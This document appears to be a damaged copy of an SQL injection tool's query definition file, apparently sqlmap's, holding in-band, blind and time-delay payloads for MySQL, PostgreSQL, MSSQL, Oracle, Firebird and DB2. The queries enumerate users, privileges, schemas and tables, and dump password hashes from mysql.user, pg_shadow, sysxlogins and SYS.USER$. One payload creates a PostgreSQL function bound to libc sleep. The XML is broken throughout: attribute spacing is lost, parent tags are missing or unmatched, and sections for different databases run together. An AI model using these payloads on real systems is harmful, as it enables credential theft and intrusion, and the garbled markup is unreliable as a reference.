<blindquery="SELECT DISTINCT(grantee) FROM information_schema.USER_PRIVILEGES LIMIT %d,1"query2="SELECT DISTINCT(user) FROM mysql.user LIMIT %d,1"count="SELECT COUNT(DISTINCT(grantee)) FROM information_schema.USER_PRIVILEGES"count2="SELECT COUNT(DISTINCT(user)) FROM mysql.user"/>
<inbandquery="SELECT user,password FROM mysql.user"condition="user"/>
<blindquery="SELECT DISTINCT(password) FROM mysql.user WHERE user='%s' LIMIT %d,1"count="SELECT COUNT(DISTINCT(password)) FROM mysql.user WHERE user='%s'"/>
<inbandquery="SELECT grantee,privilege_type FROM information_schema.USER_PRIVILEGES"condition="grantee"query2="SELECT user,select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,reload_priv,shutdown_priv,process_priv,file_priv,grant_priv,references_priv,index_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,repl_slave_priv,repl_client_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,create_user_priv FROM mysql.user"condition2="user"/>
<blindquery="SELECT DISTINCT(privilege_type) FROM information_schema.USER_PRIVILEGES WHERE grantee%s'%s' LIMIT %d,1"query2="SELECT select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,reload_priv,shutdown_priv,process_priv,file_priv,grant_priv,references_priv,index_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,repl_slave_priv,repl_client_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,create_user_priv FROM mysql.user WHERE user='%s' LIMIT %d,1"count="SELECT COUNT(DISTINCT(privilege_type)) FROM information_schema.USER_PRIVILEGES WHERE grantee%s'%s'"count2="SELECT COUNT(*) FROM mysql.user WHERE user='%s'"/>
<blindquery="SELECT DISTINCT(schema_name) FROM information_schema.SCHEMATA LIMIT %d,1"query2="SELECT DISTINCT(db) FROM mysql.db LIMIT %d,1"count="SELECT COUNT(DISTINCT(schema_name)) FROM information_schema.SCHEMATA"count2="SELECT COUNT(DISTINCT(db)) FROM mysql.db"/>
<inbandquery="SELECT table_schema,table_name FROM information_schema.TABLES"condition="table_schema"/>
<blindquery="SELECT table_name FROM information_schema.TABLES WHERE table_schema='%s' LIMIT %d,1"count="SELECT COUNT(table_name) FROM information_schema.TABLES WHERE table_schema='%s'"/>
<blindquery="SELECT column_name FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s'"query2="SELECT column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'"count="SELECT COUNT(column_name) FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s'"condition="column_name"/>
<inbandquery="SELECT schema_name FROM information_schema.SCHEMATA WHERE "query2="SELECT db FROM mysql.db WHERE "condition="schema_name"condition2="db"/>
<blindquery="SELECT DISTINCT(schema_name) FROM information_schema.SCHEMATA WHERE "query2="SELECT DISTINCT(db) FROM mysql.db WHERE "count="SELECT COUNT(DISTINCT(schema_name)) FROM information_schema.SCHEMATA WHERE "count2="SELECT COUNT(DISTINCT(db)) FROM mysql.db WHERE "condition="schema_name"condition2="db"/>
<blindquery="SELECT DISTINCT(table_schema) FROM information_schema.TABLES WHERE "query2="SELECT DISTINCT(table_name) FROM information_schema.TABLES WHERE table_schema='%s'"count="SELECT COUNT(DISTINCT(table_schema)) FROM information_schema.TABLES WHERE "count2="SELECT COUNT(DISTINCT(table_name)) FROM information_schema.TABLES WHERE table_schema='%s'"condition="table_name"condition2="table_schema"/>
<blindquery="SELECT DISTINCT(table_schema) FROM information_schema.COLUMNS WHERE "query2="SELECT DISTINCT(table_name) FROM information_schema.COLUMNS WHERE table_schema='%s'"count="SELECT COUNT(DISTINCT(table_schema)) FROM information_schema.COLUMNS WHERE "count2="SELECT COUNT(DISTINCT(table_name)) FROM information_schema.COLUMNS WHERE table_schema='%s'"condition="column_name"condition2="table_schema"/>
<timedelayquery="SELECT PG_SLEEP(%d)"query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1,300000%d))"query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep(%d)"/>
<blindquery="SELECT DISTINCT(passwd) FROM pg_shadow WHERE usename='%s' OFFSET %d LIMIT 1"count="SELECT COUNT(DISTINCT(passwd)) FROM pg_shadow WHERE usename='%s'"/>
<inbandquery="SELECT usename,(CASE WHEN usecreatedb THEN 1 ELSE 0 END),(CASE WHEN usesuper THEN 1 ELSE 0 END),(CASE WHEN usecatupd THEN 1 ELSE 0 END) FROM pg_user"condition="usename"/>
<blindquery="SELECT (CASE WHEN usecreatedb THEN 1 ELSE 0 END),(CASE WHEN usesuper THEN 1 ELSE 0 END),(CASE WHEN usecatupd THEN 1 ELSE 0 END) FROM pg_user WHERE usename='%s' OFFSET %d LIMIT 1"count="SELECT COUNT(DISTINCT(usename)) FROM pg_user WHERE usename='%s'"/>
<blindquery="SELECT tablename FROM pg_tables WHERE schemaname='%s' OFFSET %d LIMIT 1"count="SELECT COUNT(tablename) FROM pg_tables WHERE schemaname='%s'"/>
<inbandquery="SELECT attname,typname FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='%s' AND nspname='%s'"condition="attname"/>
<blindquery="SELECT attname FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='%s' AND nspname='%s'"query2="SELECT typname FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relname='%s' AND a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND attname='%s' AND nspname='%s'"count="SELECT COUNT(attname) FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='%s' AND nspname='%s'"condition="attname"/>
<inbandquery="SELECT datname FROM pg_database WHERE "query2=""condition="datname"condition2=""/>
<blindquery="SELECT DISTINCT(datname) FROM pg_database WHERE "query2=""count="SELECT COUNT(DISTINCT(datname)) FROM pg_database WHERE "count2=""condition="datname"condition2=""/>
<blindquery="SELECT DISTINCT(schemaname) FROM pg_tables WHERE "query2="SELECT tablename FROM pg_tables WHERE schemaname='%s'"count="SELECT COUNT(DISTINCT(schemaname)) FROM pg_tables WHERE "count2="SELECT COUNT(tablename) FROM pg_tables WHERE schemaname='%s'"condition="tablename"condition2="schemaname"/>
<inbandquery="SELECT nspname,relname FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND "condition="attname"condition2="nspname"/>
<blindquery="SELECT DISTINCT(nspname) FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND "query2="SELECT DISTINCT(relname) FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND nspname='%s'"count="SELECT COUNT(DISTINCT(nspname)) FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND "count2="SELECT COUNT(DISTINCT(relname)) FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND nspname='%s'"condition="attname"condition2="nspname"/>
<!-- NOTE: in NOT IN kind of queries ORDER BY is a must -->
<blindquery="SELECT TOP 1 name FROM master..syslogins WHERE name NOT IN (SELECT TOP %d name FROM master..syslogins ORDER BY name) ORDER BY name"query2="SELECT TOP 1 name FROM sys.sql_logins WHERE name NOT IN (SELECT TOP %d name FROM sys.sql_logins ORDER BY name) ORDER BY name"count="SELECT LTRIM(STR(COUNT(name))) FROM master..syslogins"count2="SELECT LTRIM(STR(COUNT(name))) FROM sys.sql_logins"/>
<inbandquery="SELECT name,master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins"query2="SELECT name,master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins"condition="name"/>
<blindquery="SELECT TOP 1 master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins WHERE name='%s' AND password NOT IN (SELECT TOP %d password FROM master..sysxlogins WHERE name='%s' ORDER BY password) ORDER BY password"query2="SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='%s' AND password_hash NOT IN (SELECT TOP %d password_hash FROM sys.sql_logins WHERE name='%s' ORDER BY password_hash) ORDER BY password_hash"count="SELECT LTRIM(STR(COUNT(password))) FROM master..sysxlogins WHERE name='%s'"count2="SELECT LTRIM(STR(COUNT(password_hash))) FROM sys.sql_logins WHERE name='%s'"/>
<blindquery="SELECT TOP 1 name FROM master..sysdatabases WHERE name NOT IN (SELECT TOP %d name FROM master..sysdatabases ORDER BY name) ORDER BY name"count="SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases"/>
<inbandquery="SELECT sysusers.name+'.'+sysobjects.name FROM %s..sysobjects INNER JOIN sysusers ON sysobjects.uid = sysusers.uid WHERE xtype IN ('u', 'v')"/>
<blindquery="SELECT TOP 1 sysusers.name+'.'+sysobjects.name FROM %s..sysobjects INNER JOIN sysusers ON sysobjects.uid = sysusers.uid WHERE xtype IN ('u', 'v') AND sysusers.name+'.'+sysobjects.name NOT IN (SELECT TOP %d sysusers.name+'.'+sysobjects.name FROM %s..sysobjects INNER JOIN sysusers ON sysobjects.uid = sysusers.uid WHERE xtype IN ('u', 'v') ORDER BY sysusers.name+'.'+sysobjects.name) ORDER BY sysusers.name+'.'+sysobjects.name"count="SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE xtype IN ('u','v')"/>
<inbandquery="SELECT %s..syscolumns.name,TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'"condition="[DB]..syscolumns.name"/>
<blindquery="SELECT %s..syscolumns.name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'"query2="SELECT TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.name='%s' AND %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'"count="SELECT LTRIM(STR(COUNT(name))) FROM %s..syscolumns WHERE id=(SELECT id FROM %s..sysobjects WHERE name='%s')"condition="[DB]..syscolumns.name"/>
<blindquery="SELECT MIN(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s)>'%s'"query2="SELECT MAX(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s) LIKE '%s'"count="SELECT LTRIM(STR(COUNT(*))) FROM %s"count2="SELECT LTRIM(STR(COUNT(DISTINCT(%s)))) FROM %s"/>
<inbandquery="SELECT name FROM %s..sysobjects WHERE xtype IN ('u','v') AND "condition="name"condition2="name"/>
<blindquery=""query2="SELECT name FROM %s..sysobjects WHERE xtype IN ('u','v') "count=""count2="SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE xtype IN ('u','v')"condition="name"condition2="name"/>
<inbandquery="SELECT %s..sysobjects.name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.xtype in ('u', 'v')"condition="[DB]..syscolumns.name"/>
<blindquery=""query2="SELECT %s..sysobjects.name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.xtype in ('u', 'v')"count=""count2="SELECT COUNT(%s..sysobjects.name) FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.xtype in ('u', 'v')"condition="[DB]..syscolumns.name"/>
<blindquery="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME),ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d"count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
<inbandquery="SELECT NAME,PASSWORD FROM SYS.USER$"condition="NAME"/>
<blindquery="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD),ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d"count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
<inbandquery="SELECT GRANTEE,PRIVILEGE FROM DBA_SYS_PRIVS"query2="SELECT USERNAME,PRIVILEGE FROM USER_SYS_PRIVS"condition="GRANTEE"condition2="USERNAME"/>
<blindquery="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE),ROWNUM AS LIMIT FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d"query2="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE),ROWNUM AS LIMIT FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d"count="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'"count2="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
<inbandquery="SELECT GRANTEE,GRANTED_ROLE FROM DBA_ROLE_PRIVS"query2="SELECT USERNAME,GRANTED_ROLE FROM USER_ROLE_PRIVS"condition="GRANTEE"condition2="USERNAME"/>
<blindquery="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE),ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d"query2="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE),ROWNUM AS LIMIT FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d"count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'"count2="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
<!-- NOTE: in Oracle schema names are the counterpart to database names on other DBMSes -->
<dbs>
<inbandquery="SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)"/>
<blindquery="SELECT OWNER FROM (SELECT OWNER,ROWNUM AS LIMIT FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)) WHERE LIMIT=%d"count="SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TABLES"/>
<inbandquery="SELECT OWNER,TABLE_NAME FROM SYS.ALL_TABLES"condition="OWNER"/>
<blindquery="SELECT TABLE_NAME FROM (SELECT TABLE_NAME,ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE OWNER='%s') WHERE LIMIT=%d"count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE OWNER='%s'"/>
<blindquery="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'"query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'"count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'"condition="COLUMN_NAME"/>
<!-- NOTE: in Oracle schema names are the counterpart to database names on other DBMSes -->
<search_db>
<inbandquery="SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES) WHERE "query2=""condition="OWNER"condition2=""/>
<blindquery="SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES) WHERE "query2=""count="SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TABLES WHERE "count2=""condition="OWNER"condition2=""/>
<inbandquery="SELECT OWNER,TABLE_NAME FROM SYS.ALL_TABLES WHERE "condition="TABLE_NAME"condition2="OWNER"/>
<blindquery="SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES WHERE "query2="SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE OWNER='%s'"count="SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TABLES WHERE "count2="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE OWNER='%s'"condition="TABLE_NAME"condition2="OWNER"/>
<inbandquery="SELECT TABLE_NAME FROM SYS.ALL_TAB_COLUMNS WHERE "condition="COLUMN_NAME"/>
<blindquery=""query2="SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TAB_COLUMNS"count=""count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TAB_COLUMNS"condition="COLUMN_NAME"/>
<blindquery="SELECT MIN(%s) FROM %s WHERE CVAR(%s)>'%s'"query2="SELECT TOP 1 %s FROM %s WHERE CVAR(%s) LIKE '%s'"count="SELECT COUNT(*) FROM %s"count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s)"/>
<timedelayquery="SELECT COUNT(*) FROM RDB$DATABASE AS T1,RDB$FIELDS AS T2,RDB$FUNCTIONS AS T3,RDB$TYPES AS T4,RDB$FORMATS AS T5,RDB$COLLATIONS AS T6"/>
<inbandquery="SELECT RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
<blindquery="SELECT FIRST 1 SKIP %d RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"count="SELECT COUNT(RDB$RELATION_NAME) FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
<blindquery="SELECT FIRST 1 SKIP %d DISTINCT(RDB$PRIVILEGE) FROM RDB$USER_PRIVILEGES WHERE RDB$USER='%s'"count="SELECT COUNT(DISTINCT(RDB$PRIVILEGE)) FROM RDB$USER_PRIVILEGES WHERE RDB$USER='%s'"/>
<!--<inband query="SELECT r.RDB$FIELD_NAME,CASE f.RDB$FIELD_TYPE WHEN 261 THEN 'BLOB' WHEN 14 THEN 'CHAR' WHEN 40 THEN 'CSTRING' WHEN 11 THEN 'D_FLOAT' WHEN 27 THEN 'DOUBLE' WHEN 10 THEN 'FLOAT' WHEN 16 THEN 'INT64' WHEN 8 THEN 'INTEGER' WHEN 9 THEN 'QUAD' WHEN 7 THEN 'SMALLINT' WHEN 12 THEN 'DATE' WHEN 13 THEN 'TIME' WHEN 35 THEN 'TIMESTAMP' WHEN 37 THEN 'VARCHAR' ELSE 'UNKNOWN' END AS field_type FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE = f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'"/>-->
<inbandquery="SELECT r.RDB$FIELD_NAME,f.RDB$FIELD_TYPE FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE = f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'"/>
<blindquery="SELECT r.RDB$FIELD_NAME FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE = f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'"query2="SELECT f.RDB$FIELD_TYPE FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE = f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s' AND r.RDB$FIELD_NAME='%s'"count="SELECT COUNT(r.RDB$FIELD_NAME) FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE = f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'"/>
<blindquery="SELECT MIN(%s) FROM %s WHERE CHR(%s)>'%s'"query2="SELECT MAX(%s) FROM %s WHERE CHR(%s) LIKE '%s'"count="SELECT COUNT(*) FROM %s"count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS value_table"/>
<inbandquery="SELECT %s..syscolumns.name,%s..syscolumns.usertype FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'"condition="[DB]..syscolumns.name"/>
<blindquery="SELECT MIN(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s)>'%s'"query2="SELECT MAX(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s) LIKE '%s'"count="SELECT COUNT(*) FROM %s"count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS value_table"/>
<inbandquery="SELECT %s..sysobjects.name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id"condition="[DB]..syscolumns.name"/>
<!-- NOTE: We have to use the complicated UDB OLAP functions in query2 because sqlmap injects isnull query inside MAX function, else we would use: SELECT MAX(versionnumber) FROM sysibm.sysversions -->
<bannerquery="SELECT service_level FROM TABLE (sysproc.env_get_inst_info())"query2="SELECT versionnumber FROM (SELECT ROW_NUMBER() OVER (ORDER BY versionnumber DESC) AS LIMIT, versionnumber FROM sysibm.sysversions) AS foobar WHERE LIMIT=1"/>
<current_userquery="SELECT user FROM SYSIBM.SYSDUMMY1"/>
<!-- NOTE: On DB2 we use the current user as default schema (database) -->
<current_dbquery="SELECT user FROM SYSIBM.SYSDUMMY1"/>
<is_dbaquery="(SELECT dbadmauth FROM syscat.dbauth WHERE grantee=current user)='Y'"/>
<users>
<inbandquery="SELECT grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'"/>
<blindquery="SELECT grantee FROM (SELECT ROW_NUMBER() OVER () AS LIMIT, grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC') AS foobar WHERE LIMIT=%d"count="SELECT COUNT(DISTINCT(grantee)) FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'"/>
</users>
<!-- NOTE: On DB2 it is not possible to list password hashes, since they are handled by the OS -->
<passwords/>
<privileges>
<inbandquery="SELECT grantee, RTRIM(tabschema)||'.'||tabname||CHR(44)||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM syscat.tabauth"query2=""condition="grantee"condition2=""/>
<blindquery="SELECT tabschema||'.'||tabname||CHR(44)||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM (SELECT ROW_NUMBER() OVER () AS LIMIT, syscat.tabauth.* FROM syscat.tabauth WHERE grantee='%s') AS foobar WHERE LIMIT=%d"count="SELECT COUNT(*) FROM syscat.tabauth WHERE grantee='%s'"/>
</privileges>
<roles/>
<!-- NOTE: in DB2 schema names are the counterpart to database names on other DBMSes -->
<dbs>
<inbandquery="SELECT schemaname FROM syscat.schemata"/>
<blindquery="SELECT schemaname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT, schemaname FROM syscat.schemata) AS foobar WHERE LIMIT=%d"count="SELECT COUNT(schemaname) FROM syscat.schemata"/>
</dbs>
<tables>
<inbandquery="SELECT tabschema, tabname FROM sysstat.tables"condition="tabschema"/>
<blindquery="SELECT tabname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT, tabname FROM sysstat.tables WHERE tabschema='%s') AS foobar WHERE LIMIT=INT('%d')"count="SELECT COUNT(*) FROM sysstat.tables WHERE tabschema='%s'"/>
</tables>
<columns>
<inbandquery="SELECT name, RTRIM(coltype)||CHR(40)||RTRIM(CAST(length AS CHAR(254)))||CHR(41) FROM sysibm.syscolumns WHERE tbname='%s'"condition="name"/>
<blindquery="SELECT name FROM sysibm.syscolumns WHERE tbname='%s'"query2="SELECT RTRIM(coltype)||CHR(40)||RTRIM(CAST(length AS CHAR(254)))||CHR(41) FROM sysibm.syscolumns WHERE tbname='%s' AND name='%s'"count="SELECT COUNT(name) FROM sysibm.syscolumns WHERE tbname='%s'"condition="name"/>
</columns>
<dump_table>
<inbandquery="SELECT %s FROM %s"/>
<blindquery="SELECT %s FROM (SELECT ROW_NUMBER() OVER () AS LIMIT, %s FROM %s) AS foobar WHERE LIMIT=%d"count="SELECT COUNT(*) FROM %s"/>
</dump_table>
<search_db>
<inbandquery="SELECT schemaname FROM syscat.schemata WHERE "query2=""condition="schemaname"condition2=""/>
<blindquery="SELECT schemaname FROM (SELECT DISTINCT(schemaname) FROM syscat.schemata WHERE "query2=""count="SELECT COUNT(DISTINCT(schemaname)) FROM syscat.schemata WHERE "count2=""condition="schemaname"condition2=""/>
<inbandquery="SELECT tabschema, tabname FROM sysstat.tables WHERE "condition="tabname"condition2="tabschema"/>
<blindquery="SELECT tabschema FROM (SELECT DISTINCT(tabschema) FROM sysstat.tables WHERE "query2="SELECT DISTINCT(tabname) FROM sysstat.tables WHERE tabschema='%s'"count="SELECT COUNT(DISTINCT(tabschema)) FROM sysstat.tables WHERE "count2="SELECT COUNT(tabname) FROM sysstat.tables WHERE tabschema='%s'"condition="tabname"condition2="tabschema"/>
</search_table>
<search_column>
<inbandquery="SELECT tabschema, tabname FROM sysstat.columns WHERE "condition="colname"condition2="tabschema"/>
<blindquery="SELECT tabschema FROM (SELECT DISTINCT(tabschema) FROM sysstat.columns WHERE "query2="SELECT DISTINCT(tabname) FROM sysstat.columns WHERE tabschema='%s'"count="SELECT COUNT(DISTINCT(tabschema)) FROM sysstat.columns WHERE "count2="SELECT COUNT(DISTINCT(tabname)) FROM sysstat.columns WHERE tabschema='%s'"condition="colname"condition2="tabschema"/>